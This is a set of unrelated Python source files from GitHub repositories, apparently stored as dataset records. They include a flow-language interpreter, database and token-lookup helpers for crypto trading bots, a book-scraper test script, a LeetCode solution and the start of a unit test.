self.messages[port].append(data)\n\n def __call__(self, data, node):\n self.add_message(data, node)\n return []\n\n def to_dict(self, env):\n return {\n \"entries\": list(env[x].id for x in self.entries),\n \"exits\": {k: [env[x].id for x in v] for k, v in self.exits.items()},\n }\n\n def clear(self):\n for k, v in self.messages.items():\n v.clear()\n\n def __init__(self, name, creator, filename, tp, params, opts, body, parent_env):\n super().__init__(name, parent_env)\n optvals = [evalf(x, self.env) for x in opts]\n self.env.update(zip(params, optvals))\n self.creator = creator\n self.filename = filename\n self.flowtype = tp\n self.body = body\n self.internal = Flow.Internal(self.id)\n self.params = params\n self.env[\"__internal__\"] = self.internal\n\n @property\n def 
parameters(self):\n return tuple(self.env[k] for k in self.params)\n\n def install(self):\n for expr in self.body:\n evalf(expr, self.env)\n\n def __call__(self, data):\n messages = [(\"__internal__\", snode, data) for snode in self.internal.entries]\n while len(messages) > 0:\n msg = messages.pop(0)\n fnode, tnode, data = msg\n if tnode == \"__internal__\":\n self.internal(data, fnode)\n elif data:\n results = self.env[tnode](data)\n messages.extend(results)\n if self.env.outer.name == \"__global__\":\n logger.info(f\"Processing: {msg}\")\n logger.info(f\"yet to process: {messages}\\n\")\n return self.forward(None)\n\n def forward(self, data):\n results = []\n for k in self.targets:\n for nodename in self.targets[k]:\n for xdata in self.internal.messages[k]:\n results.append((self.name, nodename, dict(**xdata)))\n self.internal.clear()\n return results\n\n def to_dict(self):\n a = super().to_dict()\n a[\"__internal__\"] = self.internal.to_dict(self.env)\n a[\"params\"] = {x: self.env[x] for x in self.params}\n a[\"flowtype\"] = self.flowtype\n a[\"filename\"] = self.filename\n nodes = [a]\n for k, obj in self.env.items():\n if isinstance(obj, Node):\n info = obj.to_dict()\n if isinstance(info, list):\n nodes.extend(info)\n elif isinstance(info, dict):\n nodes.append(info)\n else:\n raise TypeError(\"invalid nodeinfo type: \" + str(type(info)))\n return nodes\n\n def __repr__(self):\n return json.dumps(self.to_dict(), indent=2)\n\n def __random_details__(self):\n return self.creator.__random_details__()\n\n\nclass FlowCreator:\n def __init__(self, tp, params, randoms, body, filename):\n self.flowtype = tp\n self.params = list(params)\n self.randoms = randoms\n self.rfuncs = {k: get_randomizer(v) for k, v in randoms.items()}\n self.body = body\n self.filename = filename\n\n def __call__(self, name, opts, parent_env):\n if CONFIG.RANDOMIZE and self.randoms:\n new_opts = []\n for i, x in enumerate(opts):\n if not isconst(x):\n new_opts.append(x)\n else:\n opt = self.rfuncs[self.params[i]]()\n logger.info(f\"randomizing {self.params[i]} for {name} {opt}\")\n new_opts.append(opt)\n else:\n new_opts = opts\n flow = Flow(\n name,\n self,\n self.filename,\n self.flowtype,\n self.params,\n new_opts,\n self.body,\n parent_env,\n )\n flow.install()\n return flow\n\n def __random_details__(self):\n return {\n \"function\": self.flowtype,\n \"properties\": self.params,\n \"path\": self.filename,\n \"rules\": {k: v.to_dict() for k, v in self.rfuncs.items()},\n }\n\n\ndef check_acyclic(flowenv, fromname, toname):\n if fromname in flowenv[toname].targets:\n return False\n for n2 in flowenv[toname].targets:\n if not check_acyclic(flowenv, fromname, n2):\n return False\n return True\n\n\ndef node_creator(env, name, tp, *args):\n if env.get(name):\n raise ValueError(f\"node name {name} already exists\")\n if tp == \"loop\":\n node = LoopNode(name, *args, env)\n elif tp == \"move\":\n node = MoveNode(name, *args, env)\n elif tp == \"turn\":\n node = TurnNode(name, *args, env)\n elif isinstance(env.find(tp)[tp], FlowCreator):\n fc = env.find(tp)[tp]\n node = fc(name, args, env)\n else:\n raise TypeError(f\"invalid node type {tp}\")\n\n return node\n\n\ndef split_node_port(z, src=True):\n a = z.split(\":\")\n default = \"out\" if src else \"in\"\n if len(a) >= 2:\n return a[0], a[1]\n elif len(a) == 1:\n return a[0], default\n else:\n raise ValueError(f\"invalid port {z}\")\n\n\ndef link_creator(env, fnp, tnp):\n fnode, fport = split_node_port(fnp, src=True)\n tnode, tport = split_node_port(tnp, src=False)\n # 
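`Flow.__call__` in the record above is a classic worklist pump: messages are `(from, to, data)` triples, each delivery may enqueue more triples, and the loop drains until quiescence. A stripped-down sketch of the same pump with plain functions standing in for nodes:

```python
def node_a(data):
    return [('a', 'b', data + 1)]   # deliveries may enqueue more messages

def node_b(data):
    print('b received', data)
    return []                       # no further messages: the pump drains

nodes = {'a': node_a, 'b': node_b}
messages = [('entry', 'a', 0)]
while messages:
    _src, dst, data = messages.pop(0)
    messages.extend(nodes[dst](data))
```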
print((fnode, fport), (tnode, tport))\n # print(env)\n # assert check_acyclic(\n # env, fromnode, tonode\n # ), f\"{fromnode} -> {tonode} causes loop in Flow\"\n env[fnode].targets[fport].append(tnode)\n env[tnode].sources.append(fnode)\n\n\ndef create_exit(env, np, ports):\n if ports:\n port = ports[0]\n else:\n port = \"out\"\n node, nport = split_node_port(np)\n env[\"__internal__\"].add_exit(node, port)\n env[node].targets[port].append(\"__internal__\")\n\n\ndef run_flow(env, flowname, rest):\n d = env[flowname]\n if isinstance(d, FlowCreator):\n opts, pos, theta = rest\n bname = os.path.basename(d.filename)\n flowname = f\"__{bname}:{d.flowtype}__\"\n flow = d(flowname, opts, env)\n env[flow.name] = flow\n elif isinstance(d, Flow):\n flow = d\n else:\n raise TypeError(f\"cannot create flow from {flowname}\")\n\n if CONFIG.RUN and CONFIG.RANDOMIZE:\n pos = (pos[0] + MoveNode.dist_randomizer(), pos[1] + MoveNode.dist_randomizer())\n pos = (pos[0] % 128, pos[1] % 128)\n theta = TurnNode.randomizer()\n\n data = dict()\n data[\"params\"] = dict(position=List(pos), theta=theta)\n if CONFIG.RUN:\n flow(data[\"params\"])\n # print(flow)\n return flow, data\n\n\ndef format_static(flow, data):\n data[\"id\"] = \"__START__\"\n data[\"type\"] = \"info\"\n data[\"targets\"] = dict(out=[flow.id])\n data[\"sources\"] = []\n data[\"scope\"] = \"__global__\"\n data[\"name\"] = \"START\"\n fdata = flow.to_dict()\n for x in fdata:\n if x[\"name\"] == flow.name:\n x[\"sources\"].append(data[\"id\"])\n fdata.insert(0, data)\n return fdata\n\n\ndef resolve_scope(fdata):\n flow = {x[\"id\"]: x for x in fdata}\n subflows = [x for x in fdata if x[\"type\"] == \"flow\"]\n for sf in subflows:\n # for every subflow sf\n\n # we need to connect its internal entry nodes to its sources\n for dst_id in sf[\"__internal__\"][\"entries\"]:\n dst = flow[dst_id]\n dst[\"sources\"].remove(sf[\"id\"])\n for src_id in sf[\"sources\"]:\n src = flow[src_id]\n for k, v in src[\"targets\"].items():\n # a particular node can only be in one target location\n # so check and break if found\n if sf[\"id\"] in v:\n v.remove(sf[\"id\"])\n v.append(dst_id)\n break\n dst[\"sources\"].append(src_id)\n\n # we need to connect its internal exit nodes to its targets\n for k, v in sf[\"__internal__\"][\"exits\"].items():\n for src_id in v:\n src = flow[src_id]\n src[\"targets\"][k].remove(sf[\"id\"])\n for dst_id in sf[\"targets\"][k]:\n dst = flow[dst_id]\n dst[\"sources\"].remove(sf[\"id\"])\n dst[\"sources\"].append(src_id)\n src[\"targets\"][k].append(dst_id)\n\n # we need to change the scope for all its internal nodes\n # to the parent scope\n cur_scope = sf[\"id\"]\n par_scope = sf[\"scope\"]\n for v in flow.values():\n if v[\"scope\"] == cur_scope:\n v[\"scope\"] = par_scope\n\n # now the subflow node is no longer needed,\n # since all its internals have been resolved\n flow.pop(sf[\"id\"])\n\n # if all subflows have been resolved\n # every node is now in the global scope,\n # and has a unique ID to distinguish itself\n for k, v in flow.items():\n assert v.pop(\"scope\") == \"__global__\"\n v.pop(\"name\")\n # source information is now redundant, because\n # targets define the entire flow anyway\n v.pop(\"sources\")\n return flow\n\n\ndef include_file(filename, env):\n assert filename.startswith('\"') and filename.endswith(\n '\"'\n ), \"Filename needs to be a double-quoted string\"\n filename = filename.replace('\"', \"\")\n globl = env.find(\"+\")\n is_internal, fullname = check_internal_dir(filename)\n\n if is_internal:\n localname = 
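The `check_acyclic` helper above iterates `flowenv[toname].targets`, but `targets` is a dict of port name to node list, so both the membership test and the recursion see port names like `'out'` rather than node names; that is plausibly why the assertion in `link_creator` is commented out. A guess at the intended version, assuming the existing graph is acyclic before each new link:

```python
def check_acyclic(flowenv, fromname, toname):
    # targets is {port: [node, ...]}; walk the node lists, not the dict keys.
    for port_nodes in flowenv[toname].targets.values():
        if fromname in port_nodes:
            return False
        for n2 in port_nodes:
            if not check_acyclic(flowenv, fromname, n2):
                return False
    return True

class _Node:                         # minimal stand-in for Node
    def __init__(self):
        self.targets = {'out': []}

flowenv = {'a': _Node(), 'b': _Node()}
flowenv['a'].targets['out'].append('b')
assert check_acyclic(flowenv, 'a', 'b')       # no path b -> a: link is safe
flowenv['b'].targets['out'].append('a')
assert not check_acyclic(flowenv, 'a', 'b')   # b -> a exists: a -> b would cycle
```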
filename\n else:\n localname = None\n\n if filename not in env.includes:\n from flatland.lang.run import main as runner\n\n with open(fullname) as f:\n subprogram = f.read()\n\n t = CONFIG.RUN\n CONFIG.RUN = False\n runner(subprogram, filename, globl, localname)\n CONFIG.RUN = t\n\n\ndef standard_env() -> Env:\n \"An environment with some Scheme standard procedures.\"\n env = Env()\n env.name = \"__global__\"\n env.seed = datetime.now()\n env.includes = set()\n random.seed(env.seed)\n env.update(vars(math)) # sin, cos, sqrt, pi, ...\n env.update(\n {\n \"+\": op.add,\n \"-\": op.sub,\n \"*\": op.mul,\n \"/\": op.truediv,\n \"%\": op.mod,\n \"=\": op.eq,\n \">\": op.gt,\n \"<\": op.lt,\n \">=\": op.ge,\n \"<=\": op.le,\n \"begin\": lambda *x: x[-1],\n \"abs\": abs,\n \"apply\": lambda proc, args: proc(*args),\n \"expt\": pow,\n \"map\": map,\n \"max\": max,\n \"min\": min,\n \"not\": op.not_,\n \"null?\": lambda x: x == [],\n \"number?\": lambda x: isinstance(x, Number),\n \"print\": print,\n \"procedure?\": callable,\n \"round\": round,\n \"symbol?\": lambda x: isinstance(x, Symbol),\n \"randint\": random.randint,\n }\n )\n return env\n\n\ndef evalf(x, env): # noqa: C901\n \"Evaluate an expression in an environment.\"\n if isinstance(x, Symbol): # variable reference\n return env.find(x)[x]\n elif not isinstance(x, List): # constant\n return x\n if len(x) == 0:\n return\n op, *args = x\n if op == \"quote\": # quotation\n return args[0]\n elif op == \"#include\":\n filename = args[0]\n include_file(filename, env)\n elif op == \"if\": # conditional\n (test, conseq, alt) = args\n exp = conseq if evalf(test, env) else alt\n return evalf(exp, env)\n elif op == \"create-node\":\n name, tp, *tpargs = args\n node = node_creator(env, name, tp, *tpargs)\n env[name] = node\n if CONFIG.RANDOMIZE and CONFIG.RUN:\n x2 = List([op, name, tp, *node.parameters])\n x.clear()\n x.extend(x2)\n elif op == \"define-flow\":\n tp, params, randoms, body = args\n filename = env.find(\"__file__\")[\"__file__\"]\n rddict = dict()\n for rdp in randoms:\n parname, (rfunc, rparams) = rdp\n rparams = [evalf(bd, env) for bd in rparams]\n rddict[parname] = (rfunc, rparams)\n env[tp] = FlowCreator(tp, params, rddict, body, filename)\n if CONFIG.RANDOMIZE and CONFIG.RUN:\n x2 = List([op, tp, params, List(), body])\n x.clear()\n x.extend(x2)\n\n elif op == \"create-entry\":\n node = args[0]\n env[\"__internal__\"].add_entry(node)\n env[node].sources.append(\"__internal__\")\n elif op == \"create-exit\":\n np, *ports = args\n create_exit(env, np, ports)\n elif op == \"create-link\":\n fnp, tnp = args\n link_creator(env, fnp, tnp)\n elif op == \"run-flow\":\n flowname, *rest = args\n flow, start = run_flow(env, flowname, rest)\n if CONFIG.RANDOMIZE and CONFIG.RUN:\n x2 = List(\n [\n op,\n flowname,\n List(flow.parameters),\n start[\"params\"][\"position\"],\n start[\"params\"][\"theta\"],\n ]\n )\n x.clear()\n x.extend(x2)\n return format_static(flow, start)\n elif op == \"define\": # definition\n (symbol, exp) = args\n env[symbol] = evalf(exp, env)\n elif op == \"set\": # assignment\n (symbol, exp) = args\n env.find(symbol)[symbol] = evalf(exp, env)\n elif op == \"lambda\": # procedure\n (parms, body) = args\n return Procedure(parms, body, env)\n else: # procedure call\n proc = evalf(op, env)\n vals = [evalf(arg, env) for arg in args]\n answer = proc(*vals)\n return 
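`standard_env` in the record above seeds the interpreter with Python's `math` module and an operator table, after which `evalf` reduces nested lists via the `op, *args` unpacking. A micro version showing that reduction in isolation (a sketch, not the record's full `evalf` with its special forms):

```python
import math
import operator as op

env = {'+': op.add, '*': op.mul, 'pi': math.pi}

def evalf(x, env):
    if isinstance(x, str):          # symbol lookup
        return env[x]
    if not isinstance(x, list):     # constant
        return x
    head, *args = x                 # procedure call: evaluate head and args
    proc = evalf(head, env)
    return proc(*[evalf(a, env) for a in args])

assert evalf(['+', 1, ['*', 2, 'pi']], env) == 1 + 2 * math.pi
```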
answer\n","repo_name":"mayahq/flatland","sub_path":"src/flatland/lang/primitives.py","file_name":"primitives.py","file_ext":"py","file_size_in_byte":22417,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"7098161015","text":"import asyncio\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy import select\nfrom .models import Claims\n\nasync def claimed(user_id, db):\n async with db.AsyncSession() as session:\n claim = await session.execute(\n select(Claims).filter(Claims.user_id == user_id)\n )\n if claim:\n return claim.scalar_one_or_none()\n return False\n\nasync def add_claim(user_id, claim_data, db):\n async with db.AsyncSession() as session:\n claim = Claims(**claim_data, user_id=user_id)\n session.add(claim)\n await session.commit()\n await session.refresh(claim)\n return claim\n\nasync def change_state(user_id, db):\n async with db.AsyncSession() as session:\n claim = await session.execute(\n select(Claims).filter(Claims.user_id == user_id).first()\n )\n if claim:\n claim = claim.scalar()\n claim.claimed = not claim.claimed\n await session.commit()\n await session.refresh(claim)\n return claim\n return None\n","repo_name":"WajahatAliKK/EthDistributionBot","sub_path":"database/claim_functions.py","file_name":"claim_functions.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7101095805","text":"\nimport requests, json\nfrom bot.utils.config import ETHERSCAN_API, BSCSCAN_API, ARBISCAN_API, WETH_ADDRESS, WBNB_ADDRESS, WETH_ADDRESS_ARB\nfrom bot.uniswap_utils import uniswap_base, pancakeswap_base, sushiswap_base\nfrom datetime import datetime\nfrom database.models import Coin\nimport concurrent.futures\n\nNETWORK_TOKEN_MAPPING = {\n \"ethereum\": \"WETH\",\n \"bsc\": \"WBNB\",\n \"arbitrum\": \"WETH\",\n}\n\nimport requests\n\nNETWORK_TOKEN_MAPPING = {\n \"ethereum\": \"WETH\",\n \"bsc\": \"WBNB\",\n \"arbitrum\": \"WETH\",\n}\n\ndef fetch_token_info(contract_address):\n try:\n response = requests.get(f'https://api.dexscreener.com/latest/dex/tokens/{contract_address}')\n response.raise_for_status()\n data = response.json()\n pair = None\n # Filter pairs by network and matching quoteToken symbol\n \n for pair1 in data.get('pairs', []):\n \n if pair1.get('quoteToken', {}).get('symbol') in [\"WETH\",\"WBNB\"]:\n pair = pair1\n break\n elif pair1.get('baseToken', {}).get('symbol') in [\"WETH\",\"WBNB\"] and pair1.get('quoteToken', {}).get('address').lower() == contract_address.lower() :\n pair = pair1\n pair['baseToken'],pair['quoteToken'] = pair['quoteToken'], pair['baseToken']\n pair['priceNative'] = 1/float(pair['priceNative'])\n pair['priceUsd'] = 1/float(pair['priceUsd'])\n break\n # Extract necessary details\n if not pair:\n for pair1 in data.get('pairs', []):\n if pair1.get('baseToken', {}).get('address').lower() == contract_address.lower():\n pair = pair1\n break\n if pair:\n token_info = {\n \"contract_address\": contract_address,\n \"name\": pair.get('baseToken', {}).get('name'),\n \"symbol\": pair.get('baseToken', {}).get('symbol'),\n \"quote_symbol\": pair.get('quoteToken', {}).get('symbol'),\n \"quote_address\": pair.get('quoteToken', {}).get('address'),\n \"liquidity\": pair.get('liquidity', {}).get('quote'), # liquidity in quote currency\n \"market_cap\": pair.get('liquidity', {}).get('usd'),\n \"pair_address\": pair.get('pairAddress'), # pair address\n \"created_at\": pair.get('pairCreatedAt'),\n 
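In the claim_functions.py record above, `claimed` tests the raw `Result` object (always truthy) before extracting a scalar, and `change_state` calls `.first()` on a `select()` construct, a `Query`-era method that `Select` does not have. A hedged corrected shape, assuming SQLAlchemy 1.4+/2.0 async sessions and the same `Claims` model and `db` wrapper as that record:

```python
from sqlalchemy import select

async def claimed(user_id, db):
    async with db.AsyncSession() as session:
        result = await session.execute(
            select(Claims).filter(Claims.user_id == user_id)
        )
        claim = result.scalar_one_or_none()   # None when no row matched
        return claim if claim is not None else False

async def change_state(user_id, db):
    async with db.AsyncSession() as session:
        result = await session.execute(
            select(Claims).filter(Claims.user_id == user_id)
        )
        claim = result.scalars().first()      # first() belongs on the result
        if claim is None:
            return None
        claim.claimed = not claim.claimed
        await session.commit()
        await session.refresh(claim)
        return claim
```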
\"chart_url\" : pair.get('url'),\n 'price': pair.get('priceNative'),\n 'price_usd': pair.get('priceUsd'),\n 'network': pair.get('chainId'),\n 'dex': pair.get('dexId'),\n 'dexscreener': True\n }\n if token_info['created_at']:\n timestamp_s = int(token_info['created_at'])/1000\n token_info['created_at'] = datetime.utcfromtimestamp(timestamp_s)\n \n return token_info\n return None\n except Exception as e:\n print(f\"Error while fetching token info: {e}\")\n return None\n\n\ndef to_check_sum(contract_address):\n return uniswap_base.web3.to_checksum_address(contract_address)\n\n\ndef generate_message(coin: Coin, tracking, balance):\n unit_map = {\n \"ethereum\": \"ETH\",\n \"bsc\": \"BNB\",\n \"arbitrum\": \"ETH\",\n }\n\n unit = unit_map.get(coin.network, \"ETH\")\n address = \"etherscan.io\" if coin.network==\"ethereum\" else (\"bscscan.com\" if coin.network==\"bsc\" else \"arbiscan.io\")\n \n message = (\n f\"🔍 Tracking | {'✅' if tracking else '❌'}\\n\"\n f\"🪙 {coin.name.strip()} (#{coin.symbol}) 🔗 {unit} Token\\n\"\n f\"[CA](https://{address}/token/{coin.contract_address}): `{coin.contract_address}`\\n\"\n f\"[LP](https://{address}/token/{coin.lp_address}): `{coin.lp_address}`\\n\"\n f\"💰 Balance | {balance} {coin.symbol}\\n\"\n f\"💧 Liquidity | {coin.liquidity} W{unit}\\n\"\n f\"🧢 Market Cap | ${coin.market_cap}\\n\"\n f\"-MC/Liq: {round(coin.market_cap/coin.liquidity,2) if coin.liquidity>0 else 0}\\n\"\n f\"-Max Wallet: {coin.max_wallet_amount if coin.max_wallet_amount >0 else 100}% Ξ {0.01*coin.max_wallet_amount*coin.totalSupply if coin.max_wallet_amount>0 else ''} {coin.symbol if coin.max_wallet_amount>0 else ''}\\n\"\n f\"⚖️ Taxes | 🅑 {round(float(coin.buy_tax)*100,1)}% 🅢 {round(float(coin.sell_tax)*100,1)}%\\n\"\n f\"⚠️ Honeypot | {'Yes' if coin.is_honeypot else 'No'}\\n\"\n )\n return message\n\n\n\n\ndef get_token_abi(contract_address, network):\n if network==\"ethereum\":\n url = f\"https://api.etherscan.io/api?module=contract&action=getabi&address={contract_address}&apikey={ETHERSCAN_API}\"\n elif network==\"bsc\":\n url = f\"https://api.bscscan.com/api?module=contract&action=getabi&address={contract_address}&apikey={BSCSCAN_API}\"\n else:\n url = f\"https://api.arbiscan.io/api?module=contract&action=getabi&address={contract_address}&apikey={ARBISCAN_API}\"\n try:\n abi = requests.get(url).content\n abi = json.loads(abi).get('result',{})\n if abi:\n abi = json.loads(abi)\n return abi\n \n except:\n return {}\n\ndef find_relevant_function_names_from_abi(abi):\n function_names = []\n for item in abi:\n if item['type'] == 'function' and item['stateMutability'] in ['view', 'pure'] and not item['inputs']:\n function_name = item['name'].lower() # convert to lowercase for comparison\n if any(substring in function_name for substring in [\"buy\", \"sell\", \"buyer\", \"seller\", \"fee\", \"maxwallet\"]):\n function_names.append(item['name'])\n return function_names \n\ndef call_contract_function(contract, function_name):\n function_to_call = getattr(contract.functions, function_name)\n result = function_to_call().call()\n return result\n\n\n\ndef get_security_info(contract_address, network, d):\n if network==\"ethereum\":\n nid = 1\n elif network==\"bsc\":\n nid = 56\n else:\n nid = 42161\n url = f\"https://api.gopluslabs.io/api/v1/token_security/{str(nid)}?contract_addresses={contract_address}\"\n response = requests.get(url)\n response.raise_for_status()\n data = response.json()\n \n data = data.get('result').get(contract_address.lower())\n \n if data:\n d['buy_tax'] = 
data.get(\"buy_tax\",0)\n d['sell_tax'] = data.get(\"sell_tax\",0)\n d['sell_limit'] = True if data.get(\"cannot_sell_all\",0) == \"1\" else False\n d['anti_whale'] = True if data.get(\"is_anti_whale\",0) == \"1\" else False\n d['is_honeypot'] = True if data.get(\"is_honeypot\",0) == \"1\" else False\n d['is_blacklisted'] = True if data.get(\"is_blacklisted\",0) == \"1\" else False\n return d\n\n\n\ndef fetch_data(contract_address, quote_symbol, quote, network, dex, base):\n try:\n data = {\n 'pair_address': base.get_v2_pair_address(contract_address, quote),\n 'contract_address': contract_address,\n 'name': base.web3.eth.contract(contract_address, abi=base.erc20_abi).functions.name().call(),\n 'symbol': base.web3.eth.contract(contract_address, abi=base.erc20_abi).functions.symbol().call(),\n 'network': network,\n 'dex': dex,\n 'quote_symbol': quote_symbol,\n 'quote_address': quote\n }\n except:\n return None\n return data\n\ndef find_max_wallet(fn, token_contract):\n try:\n if 'max' in fn.lower() and 'wallet' in fn.lower():\n return call_contract_function(token_contract, fn)\n except:\n pass\n return None\n\n# def process_erc20_token(contract_address, network):\n# base_list = [('WETH', WETH_ADDRESS, 'ethereum', 'uniswap', uniswap_base),\n# ('WBNB', WBNB_ADDRESS, 'bsc', 'pancakeswap', pancakeswap_base),\n# ('WETH', WETH_ADDRESS_ARB, 'arbitrum', 'sushiswap', sushiswap_base)]\n\n# data = fetch_token_info(contract_address)\n# if not data:\n# with concurrent.futures.ThreadPoolExecutor() as executor:\n# futures = [executor.submit(fetch_data, contract_address, *base) for base in base_list]\n# for future in concurrent.futures.as_completed(futures):\n# data = future.result()\n# if data:\n# break\n\n# network = data.get('network')\n# abi = get_token_abi(contract_address, network)\n\n# if not abi or \"decimal\" not in str(abi):\n# abi = base_list[0][4].erc20_abi # Using Uniswap's abi as default.\n\n# web3_map = {base_list[i][2]: base_list[i][4].web3 for i in range(3)}\n# token_contract = web3_map.get(network, base_list[2][4].web3).eth.contract(contract_address, abi=abi)\n\n# decimals = token_contract.functions.decimals().call()\n# total_supply = token_contract.functions.totalSupply().call()\n\n# list_of_funcs = find_relevant_function_names_from_abi(abi)\n\n# max_wallet = 0\n# with concurrent.futures.ThreadPoolExecutor() as executor:\n# futures = [executor.submit(find_max_wallet, fn, token_contract) for fn in list_of_funcs]\n# for future in concurrent.futures.as_completed(futures):\n# result = future.result()\n# if result:\n# max_wallet = result\n# break\n\n# data.update({\n# 'decimals': decimals,\n# 'total_supply': int(total_supply/(10**decimals)),\n# 'maxWallet': max_wallet,\n# 'network': network,\n# 'maxWallet_perc': 100*max_wallet/total_supply\n# })\n# try:\n# data = get_security_info(contract_address, network, data)\n# except Exception as e:\n# pass\n\n# return data\n\ndef process_erc20_token(contract_address, network):\n \n try:\n data = fetch_token_info(contract_address)\n except Exception as e:\n print(e)\n data = {}\n \n \n if data:\n \n network = data['network']\n \n try:\n abi = get_token_abi(contract_address, network)\n except Exception as e:\n print(e)\n abi = None\n if not abi:\n abi = uniswap_base.erc20_abi\n elif \"decimal\" not in str(abi):\n abi = uniswap_base.erc20_abi\n if network==\"ethereum\":\n token_contract = uniswap_base.web3.eth.contract(contract_address, abi=abi)\n elif network==\"bsc\":\n \n token_contract = pancakeswap_base.web3.eth.contract(contract_address, abi=abi)\n 
else:\n token_contract = sushiswap_base.web3.eth.contract(contract_address, abi=abi)\n decimals = token_contract.functions.decimals().call()\n total_supply = (token_contract.functions.totalSupply().call())\n else:\n \n abi = uniswap_base.erc20_abi\n \n data = {'contract_address':contract_address}\n for i,base in enumerate([uniswap_base,pancakeswap_base,sushiswap_base]):\n try:\n if i==0:\n quote_symbol = \"WETH\"\n quote = WETH_ADDRESS\n network = \"ethereum\"\n dex = \"uniswap\"\n elif i==1:\n quote_symbol = \"WBNB\"\n quote= WBNB_ADDRESS\n network = \"bsc\"\n dex = \"pancakeswap\"\n else:\n quote_symbol = \"WETH\"\n quote = WETH_ADDRESS_ARB\n network = \"arbitrum\"\n dex = \"sushiswap\"\n data['pair_address'] = base.get_v2_pair_address(contract_address, quote)\n token_contract = base.web3.eth.contract(contract_address, abi=abi)\n decimals = token_contract.functions.decimals().call()\n total_supply = (token_contract.functions.totalSupply().call())\n data['name'] = token_contract.functions.name().call()\n data['symbol'] = token_contract.functions.symbol().call()\n data['network'] = network\n data['dex'] = dex\n\n data['dexscreener'] = False\n data['quote_symbol'] = quote_symbol\n data['quote_address'] = quote\n break\n except:\n continue\n \n \n\n list_of_funcs = find_relevant_function_names_from_abi(abi)\n \n maxWallet = 0\n for fn in list_of_funcs:\n if 'max' in fn.lower() and 'wallet' in fn.lower():\n try:\n maxWallet = call_contract_function(token_contract, fn)\n break\n except Exception as e:\n pass\n \n \n\n # if data:\n data['decimals'] = decimals\n data['total_supply'] = int(total_supply/(10**decimals))\n data['maxWallet'] = maxWallet\n data['maxWallet_perc'] = 100*maxWallet/total_supply\n try:\n data = get_security_info(contract_address, network, data)\n except Exception as e:\n pass\n \n return data\n\n","repo_name":"WajahatAliKK/CopyTrading","sub_path":"bot/utils/ca_helpers.py","file_name":"ca_helpers.py","file_ext":"py","file_size_in_byte":13030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28413435873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 22 12:02:58 2023\n\n@author: Kaitlin\n\nRuns test cases for the \n\"\"\"\n\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport Storygraph_Extraction_v3 as SE\n\ndef check_book_details(book):\n print(\"input: \",book)\n link = SE.get_SGLink(book)\n page = requests.get(link)\n soup = BeautifulSoup(page.content, 'html.parser')\n print(link)\n\n book_type, genre = SE.get_genre(soup)\n print(book_type,genre)\n mood = SE.get_mood(soup)\n print(mood)\n pacing = SE.get_pacing(soup)\n print(pacing)\n book_len = SE.get_book_len(soup)\n print(book_len)\n\n book_date = SE.get_book_date(soup)\n print(book_date)\n\n author = SE.get_author(soup)\n print(author)\n series = SE.get_series(soup)\n print(series)\n return\n\n\n\n# This block is a test case for the functions in the imported file\n\nbook1 = \"book\" # random novel essentially it happens to pull Book Lovers as of Jan 2023\nbook2 = \"The Calculating Stars\" # Specific novel in a series\nbook3 = \"Artemis (Andy Weir)\"\nbook4 = \"Impostors (Scott Westerfeld)\"\nbook5 = \"The Hobbit, or There and Back Again\" # Have to put the full book name unless there's a subtitle with a colon\nbook6 = \"Impostors 1\" # Proves it doesn't break with some of the details missing\nbook7 = \"Bad 
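The commented-out variant of `process_erc20_token` above races the three DEX bases with a thread pool and keeps the first non-empty answer, where the live code tries them sequentially. The "first responder wins" pattern in a self-contained sketch:

```python
import concurrent.futures
import time

def probe(source, delay, answer):
    time.sleep(delay)
    return answer                      # None means this source had nothing

with concurrent.futures.ThreadPoolExecutor() as pool:
    futures = [
        pool.submit(probe, 'uniswap', 0.2, None),
        pool.submit(probe, 'pancakeswap', 0.1, {'dex': 'pancakeswap'}),
    ]
    data = None
    for fut in concurrent.futures.as_completed(futures):
        data = fut.result()
        if data:
            break                      # first non-empty result wins
print(data)
```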
Advice\"\n\n\ncheck_book_details(book1)\ncheck_book_details(book2)\ncheck_book_details(book3)\ncheck_book_details(book4)\ncheck_book_details(book5)\ncheck_book_details(book6)\ncheck_book_details(book7)\n","repo_name":"kmmcelro/Book_Data_Analysis","sub_path":"SE_tests.py","file_name":"SE_tests.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17381041101","text":"\"\"\"\nA strobogrammatic number is a number that looks the same when rotated 180 degrees (looked at upside down).\n\nWrite a function to determine if a number is strobogrammatic. The number is represented as a string.\n\nFor example, the numbers \"69\", \"88\", and \"818\" are all strobogrammatic.\n\"\"\"\n\n\"\"\"Solution:\n 1. create dictionary\n 2. using stack to match\n\"\"\"\n\nclass Solution(object):\n def isStrobogrammatic(self, num):\n \"\"\"\n :type num: str\n :rtype: bool\n \"\"\"\n diction = {'0':'0', '1':'1', '6':'9', '8':'8', '9':'6'}\n left, right = 0, len(num)-1\n while left <= right:\n # Error 1: remember to check if key exist\n key = num[left]\n if key not in diction or diction[key] != num[right]:\n return False\n left += 1\n right -= 1\n return True\n","repo_name":"bwang8482/LeetCode","sub_path":"Google/246_Strobogrammatic_Number.py","file_name":"246_Strobogrammatic_Number.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70109032516","text":"import pandas as pd\nfrom src.logic.network import NetworkBuilder\n\nnetwork_builder = NetworkBuilder()\n\n\ndef test_builder_can_correctly_split_strings():\n corpus = [\n \"#this is an #example of a tweet\\n\\nI want this to be split-well!\",\n \"Another #example of a #corpus #entry!! LOL\",\n ]\n result = pd.Series(\n [\n [\n \"#this\",\n \"is\",\n \"an\",\n \"#example\",\n \"of\",\n \"a\",\n \"tweet\",\n \"I\",\n \"want\",\n \"this\",\n \"to\",\n \"be\",\n \"split\",\n \"well\",\n ],\n [\"Another\", \"#example\", \"of\", \"a\", \"#corpus\", \"#entry\", \"LOL\"],\n ],\n name=\"corpus\",\n )\n network_builder.load_clean_corpus(corpus)\n assert (result == network_builder.data[\"corpus\"]).all()\n\n\ndef test_builder_can_correctly_extract_hashtags():\n corpus = [\n \"#this is an #example of a tweet\\n\\nI want this to be 